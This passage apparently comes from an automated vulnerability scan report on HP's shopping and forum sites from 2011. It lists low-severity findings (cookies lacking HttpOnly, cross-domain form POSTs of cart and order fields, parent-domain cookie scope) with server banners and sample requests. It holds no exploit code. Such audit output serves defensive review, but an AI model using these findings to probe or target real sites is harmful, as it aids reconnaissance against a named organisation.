User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:23 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlktiN%2BQ0Qh6Oy%2FqvlfWcged0ic%3D; expires=Friday, 28-Oct-2011 12:15:23 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:23 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 150321

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps_head
...[SNIP]...

6.65. http://www.shopping.hp.com/webapp/shopping/mpss_portal.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/mpss_portal.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkii9qf3wJ6NCvjvlXZcwaa0ic%3D; expires=Friday, 28-Oct-2011 12:15:29 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/mpss_portal.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:29 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkii9qf3wJ6NCvjvlXZcwaa0ic%3D; expires=Friday, 28-Oct-2011 12:15:29 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:29 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 135101

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<style type="text/css">
.NewMpss{float
...[SNIP]...

6.66. http://www.shopping.hp.com/webapp/shopping/offers_guide.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/offers_guide.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkrg9uQ0Ax%2BNSDpslvbdQedn2vi; expires=Friday, 28-Oct-2011 12:15:30 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:30 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/offers_guide.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:30 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrg9uQ0Ax%2BNSDpslvbdQedn2vi; expires=Friday, 28-Oct-2011 12:15:30 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:30 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 130931

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps_he
...[SNIP]...

6.67. http://www.shopping.hp.com/webapp/shopping/print_supp_acc_landing.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/print_supp_acc_landing.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkvjdGf2Ap8NS7qs1vfcAWamWvi; expires=Friday, 28-Oct-2011 12:15:28 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/print_supp_acc_landing.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.68. http://www.shopping.hp.com/webapp/shopping/questions.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/questions.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkrjdqT2Q9wNiDpuVLZdgKXn2vi; expires=Friday, 28-Oct-2011 12:15:34 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:34 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/questions.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:34 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrjdqT2Q9wNiDpuVLZdgKXn2vi; expires=Friday, 28-Oct-2011 12:15:34 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:34 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 202446

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...

6.69. http://www.shopping.hp.com/webapp/shopping/return_exchange.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/return_exchange.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkogtiW3g58MSDvv1fXdg2dmGvi; expires=Friday, 28-Oct-2011 12:15:33 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/return_exchange.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:33 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkogtiW3g58MSDvv1fXdg2dmGvi; expires=Friday, 28-Oct-2011 12:15:33 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:33 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 147043

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...

6.70. http://www.shopping.hp.com/webapp/shopping/sale_guide.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/sale_guide.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkvj92T3Ah5Oinju1rYdwGc0ic%3D; expires=Friday, 28-Oct-2011 12:15:24 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/sale_guide.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:24 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkvj92T3Ah5Oinju1rYdwGc0ic%3D; expires=Friday, 28-Oct-2011 12:15:24 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:24 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 142157

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...

6.71. http://www.shopping.hp.com/webapp/shopping/search_request.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/search_request.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlksitue2gh%2FNirvvFbZcwOb0ic%3D; expires=Friday, 28-Oct-2011 12:15:36 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:36 GMT; path=/
hho_omni_usen=window.hpmetrics.isearch%3D%7B%27search_term%27%3A%27null%27%2C%27search_referrer%27%3A%27%27%2C%27searchtype%27%3A%27search_noresults_keyword%27%2C%27sort%27%3A%27most_popular%27%2C%27numrecords%27%3A0%2C%27numchosen%27%3A0%2C%27resultset%27%3A0%2C%27refinepath%27%3A%27%27%2C%27correct%27%3A0%2C%27suggest%27%3A%27%27%2C%27search_platform%27%3A%27EA%27%2C%27searchresultpage%27%3Atrue%2C%27searchrefine%27%3Afalse%7D; domain=.hp.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/search_request.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:36 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Content-Length: 1845
Set-Cookie: hpshopping=1&user_id=mlksitue2gh%2FNirvvFbZcwOb0ic%3D; expires=Friday, 28-Oct-2011 12:15:36 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:36 GMT; path=/
Set-Cookie: hho_omni_usen=window.hpmetrics.isearch%3D%7B%27search_term%27%3A%27null%27%2C%27search_referrer%27%3A%27%27%2C%27searchtype%27%3A%27search_noresults_keyword%27%2C%27sort%27%3A%27most_popular%27%2C%27numrecords%27%3A0%2C%27numchosen%27%3A0%2C%27resultset%27%3A0%2C%27refinepath%27%3A%27%27%2C%27correct%27%3A0%2C%27suggest%27%3A%27%27%2C%27search_platform%27%3A%27EA%27%2C%27searchresultpage%27%3Atrue%2C%27searchrefine%27%3Afalse%7D; domain=.hp.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<html>
<body>


<s
...[SNIP]...

6.72. http://www.shopping.hp.com/webapp/shopping/series_can.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/series_can.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlktiNuR3glwOyDju1vadAGc0ic%3D; expires=Friday, 28-Oct-2011 12:15:25 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/series_can.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:25 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlktiNuR3glwOyDju1vadAGc0ic%3D; expires=Friday, 28-Oct-2011 12:15:25 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:25 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 142108

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...

6.73. http://www.shopping.hp.com/webapp/shopping/store_access.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/store_access.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkqg92W2w5%2BMi%2Fpv1DcdAKXmGvi; expires=Friday, 28-Oct-2011 12:15:22 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/store_access.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:21 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkqg92W2w5%2BMi%2Fpv1DcdAKXmGvi; expires=Friday, 28-Oct-2011 12:15:22 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:22 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 150321

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps_head
...[SNIP]...

6.74. http://www.shopping.hp.com/webapp/shopping/supplies_category.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/supplies_category.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkigt%2BU0A1xOizqslbbeQ2a0ic%3D; expires=Friday, 28-Oct-2011 12:15:29 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/supplies_category.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.75. http://www.shopping.hp.com/webapp/shopping/terms.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/terms.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkoi9if2QN%2FMyvpvFvfcwCamWvi; expires=Friday, 28-Oct-2011 12:15:34 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:34 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/terms.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:34 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkoi9if2QN%2FMyvpvFvfcwCamWvi; expires=Friday, 28-Oct-2011 12:15:34 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:34 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 142285

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...

6.76. http://www.shopping.hp.com/webapp/shopping/topRatedLanding.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/topRatedLanding.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkrjNyf2gNwNCnvuVfbcAWWm2vi; expires=Friday, 28-Oct-2011 12:15:31 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:31 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/topRatedLanding.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:31 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrjNyf2gNwNCnvuVfbcAWWm2vi; expires=Friday, 28-Oct-2011 12:15:31 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:31 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 164439

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

7. Cross-domain POST previous next
There are 7 instances of this issue:

https://h30248.www3.hp.com/recycle/supplies/index.asp
http://www.shopping.hp.com/webapp/shopping/help.do
http://www.shopping.hp.com/webapp/shopping/help.do
http://www.shopping.hp.com/webapp/shopping/home.do
http://www.shopping.hp.com/webapp/shopping/print_supp_acc_landing.do
http://www.shopping.hp.com/webapp/shopping/return_exchange.do
http://www.shopping.hp.com/webapp/shopping/store_access.do

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

7.1. https://h30248.www3.hp.com/recycle/supplies/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://h30248.www3.hp.com
Path:	/recycle/supplies/index.asp

Issue detail

The page contains a form which POSTs data to the domain www.staples.com. The form contains the following fields:

btnBegin2

Request

GET /recycle/supplies/index.asp HTTP/1.1
Host: h30248.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.2. http://www.shopping.hp.com/webapp/shopping/help.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/help.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Prod_List
User_ID
Cart_ID
Cart_Subtotal
CTO_ProdID
CTO_ProdName
Search_Request_Text
Order_Number
ClosedURL

Request

GET /webapp/shopping/help.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.3. http://www.shopping.hp.com/webapp/shopping/help.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/help.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Prod_List
User_ID
Cart_ID
Cart_Subtotal
CTO_ProdID
CTO_ProdName
Search_Request_Text
Order_Number
ClosedURL

Request

GET /webapp/shopping/help.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.4. http://www.shopping.hp.com/webapp/shopping/home.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/home.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Prod_List
User_ID
Cart_ID
Cart_Subtotal
CTO_ProdID
CTO_ProdName
Search_Request_Text
Order_Number
ClosedURL

Request

GET /webapp/shopping/home.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.5. http://www.shopping.hp.com/webapp/shopping/print_supp_acc_landing.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/print_supp_acc_landing.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Prod_List
User_ID
Cart_ID
Cart_Subtotal
CTO_ProdID
CTO_ProdName
Search_Request_Text
Order_Number
ClosedURL

Request

GET /webapp/shopping/print_supp_acc_landing.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:28 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkvjdGf2Ap8NS7qs1vfcAWamWvi; expires=Friday, 28-Oct-2011 12:15:28 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:28 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 202379

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
<form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Accessories%20Store%20Printer%20Supplies" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

7.6. http://www.shopping.hp.com/webapp/shopping/return_exchange.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/return_exchange.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Prod_List
User_ID
Cart_ID
Cart_Subtotal
CTO_ProdID
CTO_ProdName
Search_Request_Text
Order_Number
ClosedURL

Request

GET /webapp/shopping/return_exchange.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.7. http://www.shopping.hp.com/webapp/shopping/store_access.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/store_access.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Prod_List
User_ID
Cart_ID
Cart_Subtotal
CTO_ProdID
CTO_ProdName
Search_Request_Text
Order_Number
ClosedURL

Request

GET /webapp/shopping/store_access.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8. Cookie scoped to parent domain previous next
There are 63 instances of this issue:

https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx
http://h30499.www3.hp.com/t5/Community-Feedback-&-Suggestions/bd-p/community-feedback-suggestions
http://h30499.www3.hp.com/t5/Fortify-Software-Security-Center-Discussion/bd-p/sws-Fortifyforum
http://h30499.www3.hp.com/t5/ITRC-Business-Availability-Center-Forum/bd-p/itrc-875
http://h30507.www3.hp.com/
http://www.shopping.hp.com/accessories-store/computer
http://www.shopping.hp.com/accessories-store/handheld
http://www.shopping.hp.com/accessories-store/printer
http://www.shopping.hp.com/accessories-store/scanner
http://www.shopping.hp.com/accessories-store/touchpad
http://www.shopping.hp.com/can/computer/categories/ac_adapters/1/accessories
http://www.shopping.hp.com/can/computer/categories/ac_adapters/2/accessories
http://www.shopping.hp.com/can/computer/categories/carrying_cases/1/accessories
http://www.shopping.hp.com/can/computer/categories/carrying_cases/2/accessories
http://www.shopping.hp.com/can/computer/categories/digital_cameras/1/accessories
http://www.shopping.hp.com/can/computer/categories/digital_cameras/2/accessories
http://www.shopping.hp.com/can/computer/categories/docking_solutions/1/accessories
http://www.shopping.hp.com/can/computer/categories/docking_solutions/2/accessories
http://www.shopping.hp.com/can/computer/categories/home_theater_audio/1/accessories
http://www.shopping.hp.com/can/computer/categories/home_theater_audio/2/accessories
http://www.shopping.hp.com/can/computer/categories/memory/1/accessories
http://www.shopping.hp.com/can/computer/categories/memory/2/accessories
http://www.shopping.hp.com/can/computer/categories/mice_keyboards/1/accessories
http://www.shopping.hp.com/can/computer/categories/mice_keyboards/2/accessories
http://www.shopping.hp.com/can/computer/categories/music_devices/1/accessories
http://www.shopping.hp.com/can/computer/categories/music_devices/2/accessories
http://www.shopping.hp.com/can/computer/categories/networking/1/accessories
http://www.shopping.hp.com/can/computer/categories/networking/2/accessories
http://www.shopping.hp.com/can/computer/categories/notebook_batteries/1/accessories
http://www.shopping.hp.com/can/computer/categories/notebook_batteries/2/accessories
http://www.shopping.hp.com/can/computer/categories/photo_frames/1/accessories
http://www.shopping.hp.com/can/computer/categories/photo_frames/2/accessories
http://www.shopping.hp.com/can/computer/categories/projector_accessories/1/accessories
http://www.shopping.hp.com/can/computer/categories/projector_accessories/2/accessories
http://www.shopping.hp.com/can/computer/categories/security_systems/2/accessories
http://www.shopping.hp.com/can/computer/categories/software/1/accessories
http://www.shopping.hp.com/can/computer/categories/software/2/accessories
http://www.shopping.hp.com/can/computer/categories/speakers_headsets/1/accessories
http://www.shopping.hp.com/can/computer/categories/speakers_headsets/2/accessories
http://www.shopping.hp.com/can/computer/categories/storage_solutions/1/accessories
http://www.shopping.hp.com/can/computer/categories/storage_solutions/2/accessories
http://www.shopping.hp.com/can/computer/categories/tvs/1/accessories
http://www.shopping.hp.com/can/computer/categories/tvs/2/accessories
http://www.shopping.hp.com/webapp/shopping/accessories_landing.do
http://www.shopping.hp.com/webapp/shopping/can.do
http://www.shopping.hp.com/webapp/shopping/catalogRequest.do
http://www.shopping.hp.com/webapp/shopping/cto.do
http://www.shopping.hp.com/webapp/shopping/express_store.do
http://www.shopping.hp.com/webapp/shopping/feedback.do
http://www.shopping.hp.com/webapp/shopping/help.do
http://www.shopping.hp.com/webapp/shopping/home.do
http://www.shopping.hp.com/webapp/shopping/mpss_portal.do
